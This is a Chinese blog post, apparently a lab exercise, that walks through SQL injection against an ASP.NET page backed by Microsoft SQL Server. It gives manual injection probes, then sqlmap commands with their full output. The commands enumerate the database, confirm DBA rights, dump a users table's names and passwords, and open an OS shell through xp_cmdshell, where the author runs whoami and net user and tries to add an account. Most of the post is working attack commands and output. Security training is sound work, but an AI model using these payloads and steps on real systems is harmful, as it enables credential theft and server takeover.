1 手工注入
1、判断是否有注入。
加单引号发现有报错,存在报错注入。
http://bug.cc:8201/get.aspx?id=1'
and 1=1显示正常, and 1=2不显示数据,存在布尔型注入。
http://bug.cc:8201/get.aspx?id=1 and 1=1
加/显示正常,加-0显示错误。
2、判断数据库类型,显示正常代表为mssql(即sqlserver)。 and (select count(*) from sysobjects)>0
http://bug.cc:8201/get.aspx?id=1 and (select count(*) from sysobjects)>0
3、判断字段个数,order by 4,通过尝试发现有4个字段。
http://bug.cc:8201/get.aspx?id=1 order by 4
4、
2 工具注入
2.1 sqlmap
过程如下:
1、测试注入点:sqlmap -u 'http://192.168.5.186:8201/get.aspx?id=1'
2、获取当前数据库:sqlmap -u 'http://192.168.5.186:8201/get.aspx?id=1' --current-db
3、获取当前用户:sqlmap -u 'http://192.168.5.186:8201/get.aspx?id=1' --current-user
4、判断管理员权限:sqlmap -u 'http://192.168.5.186:8201/get.aspx?id=1' --is-dba
5、获取数据库表:sqlmap -u 'http://192.168.5.186:8201/get.aspx?id=1' -D test --tables
6、获取数据库表的列:sqlmap -u 'http://192.168.5.186:8201/get.aspx?id=1' -D test -T users --columns
7、获取数据库数据:sqlmap -u 'http://192.168.5.186:8201/get.aspx?id=1' -D test -T users -C name,password --dump
8、执行命令:sqlmap -u 'http://192.168.5.186:8201/get.aspx?id=1' --os-shell
1、测试注入点:sqlmap -u "http://192.168.5.186:8201/get.aspx?id=1"
结果如下:
Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=1 AND 9842=9842 Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries (comment) Payload: id=1;WAITFOR DELAY '0:0:5'-- Type: time-based blind Title: Microsoft SQL Server/Sybase time-based blind (IF) Payload: id=1 WAITFOR DELAY '0:0:5' Type: UNION query Title: Generic UNION query (NULL) - 4 columns Payload: id=1 UNION ALL SELECT NULL,CHAR(113)+CHAR(112)+CHAR(106)+CHAR(112)+CHAR(113)+CHAR(111)+CHAR(119)+CHAR(122)+CHAR(109)+CHAR(83)+CHAR(70)+CHAR(74)+CHAR(121)+CHAR(111)+CHAR(99)+CHAR(71)+CHAR(121)+CHAR(79)+CHAR(90)+CHAR(65)+CHAR(87)+CHAR(89)+CHAR(102)+CHAR(82)+CHAR(83)+CHAR(120)+CHAR(99)+CHAR(65)+CHAR(104)+CHAR(119)+CHAR(82)+CHAR(107)+CHAR(82)+CHAR(112)+CHAR(120)+CHAR(68)+CHAR(68)+CHAR(97)+CHAR(97)+CHAR(81)+CHAR(112)+CHAR(88)+CHAR(98)+CHAR(113)+CHAR(77)+CHAR(113)+CHAR(98)+CHAR(118)+CHAR(106)+CHAR(113),NULL,NULL-- ouYA --- [03:08:54] [INFO] testing Microsoft SQL Server [03:08:55] [INFO] confirming Microsoft SQL Server [03:08:55] [INFO] the back-end DBMS is Microsoft SQL Server web server operating system: Windows 7 or 2008 R2 web application technology: Microsoft IIS 7.5, ASP.NET, ASP.NET 2.0.50727 back-end DBMS: Microsoft SQL Server 2008
2、获取当前数据库:sqlmap -u 'http://192.168.5.186:8201/get.aspx?id=1' --current-db
current database: 'test'
3、获取当前用户:sqlmap -u 'http://192.168.5.186:8201/get.aspx?id=1' --current-user
current user: 'sa'
4、判断管理员权限:sqlmap -u 'http://192.168.5.186:8201/get.aspx?id=1' --is-dba
current user is DBA: True
5、获取数据库表:sqlmap -u 'http://192.168.5.186:8201/get.aspx?id=1' -D test --tables
Database: test
[3 tables]
+--------------+
| cmd |
| sqlmapoutput |
| users |
+--------------+
6、获取数据库表的列:sqlmap -u 'http://192.168.5.186:8201/get.aspx?id=1' -D test -T users --columns
Database: test
Table: users
[4 columns]
+----------+---------+
| Column | Type |
+----------+---------+
| age | int |
| id | int |
| name | varchar |
| password | varchar |
+----------+---------+
7、获取数据库数据:sqlmap -u 'http://192.168.5.186:8201/get.aspx?id=1' -D test -T users -C name,password --dump
Database: test
Table: users
[2 entries]
+--------+----------+
| name | password |
+--------+----------+
| admin1 | admin2 |
| admin2 | admin2 |
+--------+----------+
8、执行命令:sqlmap -u 'http://192.168.5.186:8201/get.aspx?id=1' --os-shell
└─# sqlmap -u 'http://192.168.5.186:8201/get.aspx?id=1' --os-shell ___ __H__ ___ ___[)]_____ ___ ___ {1.6.7#stable} |_ -| . [.] | .'| . | |___|_ [)]_|_|_|__,| _| |_|V... |_| https://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting @ 03:21:03 /2022-12-29/ [03:21:03] [INFO] resuming back-end DBMS 'microsoft sql server' [03:21:03] [INFO] testing connection to the target URL [03:21:04] [INFO] heuristics detected web page charset 'utf-8' [03:21:04] [CRITICAL] previous heuristics detected that the target is protected by some kind of WAF/IPS sqlmap resumed the following injection point(s) from stored session: --- Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=1 AND 9842=9842 Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries (comment) Payload: id=1;WAITFOR DELAY '0:0:5'-- Type: time-based blind Title: Microsoft SQL Server/Sybase time-based blind (IF) Payload: id=1 WAITFOR DELAY '0:0:5' Type: UNION query Title: Generic UNION query (NULL) - 4 columns Payload: id=1 UNION ALL SELECT NULL,CHAR(113)+CHAR(112)+CHAR(106)+CHAR(112)+CHAR(113)+CHAR(111)+CHAR(119)+CHAR(122)+CHAR(109)+CHAR(83)+CHAR(70)+CHAR(74)+CHAR(121)+CHAR(111)+CHAR(99)+CHAR(71)+CHAR(121)+CHAR(79)+CHAR(90)+CHAR(65)+CHAR(87)+CHAR(89)+CHAR(102)+CHAR(82)+CHAR(83)+CHAR(120)+CHAR(99)+CHAR(65)+CHAR(104)+CHAR(119)+CHAR(82)+CHAR(107)+CHAR(82)+CHAR(112)+CHAR(120)+CHAR(68)+CHAR(68)+CHAR(97)+CHAR(97)+CHAR(81)+CHAR(112)+CHAR(88)+CHAR(98)+CHAR(113)+CHAR(77)+CHAR(113)+CHAR(98)+CHAR(118)+CHAR(106)+CHAR(113),NULL,NULL-- ouYA --- [03:21:04] [INFO] the back-end DBMS is Microsoft SQL Server web server operating system: Windows 2008 R2 or 7 web application technology: Microsoft IIS 7.5, ASP.NET, ASP.NET 2.0.50727 back-end DBMS: Microsoft SQL Server 2008 [03:21:04] [WARNING] reflective value(s) found and filtering out [03:21:04] [INFO] testing if current user is DBA [03:21:04] [INFO] checking if xp_cmdshell extended procedure is available, please wait.. [03:21:13] [INFO] xp_cmdshell extended procedure is available [03:21:13] [INFO] testing if xp_cmdshell extended procedure is usable [03:21:13] [INFO] xp_cmdshell extended procedure is usable [03:21:13] [INFO] going to use extended procedure 'xp_cmdshell' for operating system command execution [03:21:13] [INFO] calling Windows OS shell. To quit type 'x' or 'q' and press ENTER os-shell> whoami do you want to retrieve the command standard output? [Y/n/a] command standard output: 'nt authority\network service' os-shell> net user do you want to retrieve the command standard output? [Y/n/a] command standard output: --- \\ 的用户帐户 ------------------------------------------------------------------------------- Administrator Guest 命令运行完毕,但发生一个或多个错误。 --- os-shell> net user test 123.com /add do you want to retrieve the command standard output? [Y/n/a] command standard output: --- 发生系统错误 5。 拒绝访问。 --- os-shell>
标签:sqlmap,WEB,get,8201,CHAR,aspx,id,注入 From: https://www.cnblogs.com/snow2021/p/17012997.html